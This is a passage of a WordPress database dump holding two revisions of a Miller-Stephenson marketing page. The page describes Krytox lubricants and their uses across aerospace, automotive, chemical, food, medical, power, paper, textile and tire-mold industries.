lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 13:55:01', '2016-09-29 13:55:01', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2141, 2, '2016-09-29 13:57:38', '2016-09-29 13:57:38', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<a name="aerospace"></a>\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or 